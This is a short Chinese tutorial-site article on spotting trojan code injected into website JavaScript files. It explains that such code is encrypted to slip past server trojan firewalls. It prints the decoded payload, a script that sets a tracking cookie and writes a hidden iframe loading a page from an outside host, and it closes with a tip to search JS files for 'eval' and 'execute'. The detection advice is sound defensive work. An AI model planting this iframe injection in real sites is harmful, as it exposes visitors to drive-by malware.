盘绰网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

JS文件挂马代码区分

时间:2023/8/29作者:未知来源:盘绰网教程人气:


[摘要]'),0,{})); 我想, 如果单单看这个代码的话, 很难发现JS文件是被挂了iframe。 现在挂马手段越来越高明, 挂的代码都是经过算法加密的。 让大家不能简单的找出挂马。 估...
'),0,{}));

我想, 如果单单看这个代码的话, 很难发现JS文件是被挂了iframe。 现在挂马手段越来越高明, 挂的代码都是经过算法加密的。 让大家不能简单的找出挂马。 估计这样写, 也是为了逃避服务器上安装的一些木马防火墙吧。 不知道有没有人服务器上装过木马防火墙, 可以拿这个代码试一下, 是否能躲避过木马防火墙。

以上加密后的代码最终运行的代码为:

var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe src=http://360safes.3322.org/include/as.asp width=10 height=0></iframe>")}。

这里教大家一个简单的搜索这种马的方法:用editplus中的文件夹搜索, 搜索所有js文件, 搜索关键字为:eval和execute, 然后一个个去看, 一般都能找出这种JS木马的。



关键词:  JS文件挂马代码区分





Copyright © 2012-2018 盘绰网教程(http://www.panchuo.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版